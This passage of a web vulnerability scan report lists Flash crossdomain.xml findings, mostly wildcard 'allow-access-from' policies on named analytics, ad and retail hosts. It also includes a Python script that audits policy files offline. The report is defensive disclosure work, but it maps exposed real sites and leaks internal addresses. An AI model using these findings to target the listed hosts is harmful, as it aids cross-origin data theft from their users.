HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:28 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Cache-Control: public, max-age=18000
Expires: Mon, 16 May 2011 06:56:28 GMT
Last-Modified: Wed, 06 Oct 2004 16:26:56 GMT
ETag: "c9-41641cd0"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.33. http://media2.legacy.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*" secure="true": any origin gets two-way access. The explicit secure="true" only means that, where this file is served over HTTPS, SWFs loaded over plain HTTP are refused (it is also the default when the attribute is omitted). The wildcard, not the secure flag, is the problem.

Request

GET /crossdomain.xml HTTP/1.0
Host: media2.legacy.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.34. http://metrics.brookstone.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.brookstone.com
Path:   /crossdomain.xml

Issue detail

Omniture template (Server: Omniture DC/2.0.0) on a first-party metrics hostname: allow-access-from domain="*" secure="false" and allow-http-request-headers-from domain="*" headers="*". Any origin can read responses from, and send arbitrary request headers to, the collection endpoint. The first-party hostname matters: cookies set for the parent brookstone.com domain are sent with those cross-origin requests. The policy is the vendor's, so the fix is coordinated with the analytics provider.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.brookstone.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:55 GMT
Server: Omniture DC/2.0.0
xserver: www287
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.35. http://metrics.ftd.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /crossdomain.xml

Issue detail

Same Omniture template as the previous entry: allow-access-from domain="*" secure="false" plus allow-http-request-headers-from domain="*" headers="*". Any origin gets two-way access and may add arbitrary request headers, and cookies scoped to the parent ftd.com domain accompany those requests.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:37 GMT
Server: Omniture DC/2.0.0
xserver: www400
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.36. http://metrics.gnc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.gnc.com
Path:   /crossdomain.xml

Issue detail

Omniture template: allow-access-from domain="*" secure="false" with allow-http-request-headers-from domain="*" headers="*". Any origin gets two-way access plus arbitrary request headers, and cookies scoped to the parent gnc.com domain ride along. Note that this is the same host that appears under the SQL injection findings earlier in the report.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:43 GMT
Server: Omniture DC/2.0.0
xserver: www402
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.37. http://metrics.mcafee.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.mcafee.com
Path:   /crossdomain.xml

Issue detail

Omniture template: allow-access-from domain="*" secure="false" with allow-http-request-headers-from domain="*" headers="*". Any origin gets two-way access plus arbitrary request headers, and cookies scoped to the parent mcafee.com domain are sent with those requests.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:39 GMT
Server: Omniture DC/2.0.0
xserver: www295
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.38. http://metrics.pacsun.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.pacsun.com
Path:   /crossdomain.xml

Issue detail

Omniture template: allow-access-from domain="*" secure="false" with allow-http-request-headers-from domain="*" headers="*". Any origin gets two-way access plus arbitrary request headers, with parent-domain pacsun.com cookies attached.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.pacsun.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
xserver: www23
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.39. http://metrics.petsmart.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.petsmart.com
Path:   /crossdomain.xml

Issue detail

Omniture template: allow-access-from domain="*" secure="false" with allow-http-request-headers-from domain="*" headers="*". Any origin gets two-way access plus arbitrary request headers, with parent-domain petsmart.com cookies attached.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:15 GMT
Server: Omniture DC/2.0.0
xserver: www500
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.40. http://mlarmani.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlarmani.122.2o7.net
Path:   /crossdomain.xml

Issue detail

Omniture template on a vendor 2o7.net hostname: allow-access-from domain="*" secure="false" with allow-http-request-headers-from domain="*" headers="*". Any origin gets two-way access and may send arbitrary request headers; the file is served as text/html, which Flash Player still accepts for a master policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mlarmani.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:02 GMT
Server: Omniture DC/2.0.0
xserver: www80
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.41. http://o.toshibadirect.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.toshibadirect.com
Path:   /crossdomain.xml

Issue detail

Omniture template on a first-party hostname: allow-access-from domain="*" secure="false" with allow-http-request-headers-from domain="*" headers="*". Any origin gets two-way access plus arbitrary request headers, with parent-domain toshibadirect.com cookies attached.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Omniture DC/2.0.0
xserver: www378
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.42. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*" secure="false": any origin, including SWFs loaded over plain HTTP where this file is also served over HTTPS, gets two-way access. The file's own comment ("allow Flash 7+ players to invoke JS from this server") states the intent; the capture is truncated, so any site-control element is not visible.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 16 May 2011 02:02:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.43. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*" and nothing else: two-way access for any origin. The response carries Cache-Control: private and an already-expired Expires header, so at least a corrected policy would reach clients promptly.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 16 May 2011 01:56:38 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 16 May 2011 01:56:38 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.44. http://rpt.footlocker.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rpt.footlocker.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*": two-way access for any origin. The response is the same file seen on data.coremetrics.com at the top of this section and on server.bhphotovideo.com and www26.orientaltrading.com below (Content-Length 199, Last-Modified 06 Dec 2007, the same ETag suffix and the same P3P header), so this is one analytics-platform policy reused across customer hostnames, and cookies scoped to the parent footlocker.com domain are sent with cross-origin requests to it.

Request

GET /crossdomain.xml HTTP/1.0
Host: rpt.footlocker.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:27 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "16d800-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=998
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.45. http://s.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*": two-way access for any origin. The closing tag is cut off in the capture, so nothing beyond the single entry is visible.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:31:41 GMT
Content-length: 202
Etag: "ca-4ceae13d"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.46. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*" (secure omitted, so it defaults to true): two-way access for any origin. A site-control element follows but is truncated in this capture. The file is cached for a week (max-age=604800), so allow for that delay when verifying a fix.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 02:00:14 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.47. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*": two-way access for any origin. The file is served as text/plain with no XML declaration or DOCTYPE; Flash Player accepts any text/* type for a master policy, so the policy is in effect despite the unusual type.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:54:22 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.48. http://server.bhphotovideo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://server.bhphotovideo.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*": two-way access for any origin. This is the same analytics-platform file seen on data.coremetrics.com and rpt.footlocker.com (identical length, timestamp and P3P header), served here under a first-party hostname, so parent-domain bhphotovideo.com cookies accompany cross-origin requests to it.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.bhphotovideo.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "3a990e-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=978
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.49. http://sv.liveclicker.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*" to-ports="*" secure="false": two-way access for any origin, including SWFs loaded over plain HTTP where this file is also served over HTTPS. The to-ports attribute only has meaning in socket policy files and is ignored in a policy served over HTTP. The capture is truncated after this entry.

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.liveclicker.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:03 GMT
Server: Apache
Last-Modified: Mon, 04 Jan 2010 21:03:13 GMT
ETag: "111db0-13e-ca84640"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" secure="false" />
...[SNIP]...

6.50. http://tags.mediaforge.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.mediaforge.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*" in a schema-declared policy file: two-way access for any origin. A site-control element follows but is truncated in the capture. Merely fetching the policy also sets a year-long uID tracking cookie on .mediaforge.com.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.mediaforge.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Date: Mon, 16 May 2011 01:53:12 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Server: nginx/0.8.53
Set-Cookie: uID=CqpSnE3Qg4hGhAOdC2IDAg==; expires=Tue, 15-May-12 01:53:12 GMT; domain=.mediaforge.com; path=/
Content-Length: 269
Connection: Close

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><allow-access-from domain="*"/><site-control
...[SNIP]...

6.51. http://uat.netmng.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://uat.netmng.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*" with no site-control element and no DOCTYPE (the DOCTYPE is optional): two-way access for any origin.

Request

GET /crossdomain.xml HTTP/1.0
Host: uat.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:38 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "6c1d1-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.52. http://wasc.homedepot.ca/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wasc.homedepot.ca
Path:   /crossdomain.xml

Issue detail

Omniture template on a first-party hostname: allow-access-from domain="*" secure="false" with allow-http-request-headers-from domain="*" headers="*". Any origin gets two-way access plus arbitrary request headers, with parent-domain homedepot.ca cookies attached. The same site's storefront appears under the SQL injection findings earlier in the report.

Request

GET /crossdomain.xml HTTP/1.0
Host: wasc.homedepot.ca

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
xserver: www8
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.53. http://www.mapquestapi.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquestapi.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*" secure="true" combined with site-control permitted-cross-domain-policies="all": any origin gets two-way access (HTTPS content is limited to HTTPS-loaded SWFs by the secure flag), and Flash Player will additionally honour policy files at any path on the host, so any URL on it that can be made to return policy XML becomes a policy source. For an API host the wildcard is often deliberate, but "all" should be reduced to master-only regardless.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquestapi.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"276-1302871693000"
Last-Modified: Fri, 15 Apr 2011 12:48:13 GMT
Content-Type: application/xml
Content-Length: 276
Date: Mon, 16 May 2011 01:53:40 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" /
...[SNIP]...
<allow-access-from domain="*" secure="true"/>
...[SNIP]...

6.54. http://www26.orientaltrading.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www26.orientaltrading.com
Path:   /crossdomain.xml

Issue detail

allow-access-from domain="*": two-way access for any origin. This is the same analytics-platform file seen on data.coremetrics.com, rpt.footlocker.com and server.bhphotovideo.com, served under a first-party hostname, so parent-domain orientaltrading.com cookies accompany cross-origin requests to it.

Request

GET /crossdomain.xml HTTP/1.0
Host: www26.orientaltrading.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:11 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "29b86a-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=915
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
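The two High findings above, and the wildcard and specific-domain findings that follow, all come down to what the allow-access-from entries and the site-control element of a crossdomain.xml permit. The checker below is an added example for this report, not part of the XSS.CX or Burp Suite output: it parses a captured policy offline and reports the same classes of issue (any-domain access, wildcards, secure="false", permitted-cross-domain-policies="all", private addresses, whitespace-padded and non-standard domain values). The policy texts, hostnames and rule strings in it are constructed, modelled on the captured policies in this section, and are not any real host's policy.

```python
"""Audit a Flash crossdomain.xml for the over-permissive patterns flagged
in the findings above.  Added example, not part of the scanner report."""
import ipaddress
import re
import xml.etree.ElementTree as ET

# Domain forms the cross-domain-policy format accepts: "*", "*.domain",
# a hostname, or an IP address.  Anything else is reported as malformed
# (for example "*.*.example.com", ".example.com", "host:7778").
_WILDCARD_RE = re.compile(r"^\*\.[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*$")
_HOST_RE = re.compile(r"^[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*$")


def classify_domain(domain):
    """Classify one allow-access-from domain value."""
    if domain == "*":
        return "any-domain"
    if _WILDCARD_RE.match(domain):
        return "wildcard"
    try:
        ip = ipaddress.ip_address(domain)
    except ValueError:
        ip = None
    if ip is not None:
        return "private-ip" if (ip.is_private or ip.is_loopback) else "ip"
    if _HOST_RE.match(domain):
        return "host"
    return "malformed"


def audit_policy(xml_text):
    """Return (severity, rule, value) findings for one policy document.

    ElementTree does not fetch the external DTD named in the DOCTYPE, so a
    captured policy can be parsed offline exactly as it was served."""
    root = ET.fromstring(xml_text.strip())
    findings = []

    site_control = root.find("site-control")
    if site_control is not None and \
            site_control.get("permitted-cross-domain-policies", "").lower() == "all":
        # "all" makes Flash Player honour policy files anywhere on the host,
        # not just this master file.
        findings.append(("medium", "site-control permits non-master policy files", "all"))

    for el in root.findall("allow-access-from"):
        raw = el.get("domain", "")
        domain = raw.strip()
        if domain != raw:
            findings.append(("low", "domain value has surrounding whitespace", repr(raw)))
        kind = classify_domain(domain)
        if kind == "any-domain":
            findings.append(("high", "allow-access-from any domain", domain))
        elif kind == "wildcard":
            findings.append(("low", "wildcard domain", domain))
        elif kind == "private-ip":
            findings.append(("info", "private or loopback address leaks internal topology", domain))
        elif kind == "malformed":
            findings.append(("low", "non-standard domain pattern", domain))
        # secure="false" only matters for a policy served over HTTPS: it lets
        # a SWF loaded over plain http:// reach the https:// host.
        if el.get("secure", "true").lower() == "false":
            findings.append(("medium", 'secure="false" admits http:// requesters', domain))

    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain") == "*" and el.get("headers", "") == "*":
            findings.append(("high", "any domain may send arbitrary request headers", "*"))

    return findings


# Constructed sample modelled on the patterns in the captured policies above.
WEAK_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*" secure="false" />
<allow-access-from domain="*.example.com" />
<allow-access-from domain=" cdn.example.com " />
<allow-access-from domain="10.80.1.144" />
<allow-access-from domain="*example.com" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
"""

# The shape a hardened policy takes: master file only, named hosts, HTTPS only.
HARDENED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="www.example.com" secure="true" />
</cross-domain-policy>
"""

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name)
        for severity, rule, value in audit_policy(policy):
            print("  [%s] %s: %s" % (severity, rule, value))
```

Run it against a saved response body; the empty result for the hardened policy shows the target shape (master-only, named hosts, secure="true"). The checker never contacts a host, and secure="false" is only meaningful when the master policy itself was fetched over HTTPS, so record the scheme the policy was captured from. It also cannot judge whether a syntactically valid wildcard is safe: a wildcard over a multi-tenant service is one a human reviewer must still reject.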

6.55. http://ace.imageg.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ace.imageg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ace.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:47:27 GMT
Date: Mon, 16 May 2011 10:47:27 GMT
Content-Length: 698
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.56. http://ads.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Mon, 16 May 2011 01:55:16 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

6.57. http://ads.al.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.al.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.al.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:59 GMT
Server: Apache/2.0.63 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 20 Jul 2010 15:58:07 GMT
ETag: "2013b-284-c045c1c0"
Accept-Ranges: bytes
Content-Length: 644
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_mc-pbt-qspe=ffffffff090d165f45525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 02:12:59 GMT;path=/;httponly

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.vidavee.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.edgesuite.net"/>
<allow-access-from domain="*.edgecast.net"/>
<allow-access-from domain="*.advance.net"/>
<allow-access-from domain="*.tremormedia.com"/>
<allow-access-from domain="*.adserver.adtechus.com"/>
<allow-access-from domain="*.adserver.adtech.de"/>
...[SNIP]...

6.58. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=109
Expires: Mon, 16 May 2011 10:42:55 GMT
Date: Mon, 16 May 2011 10:41:06 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
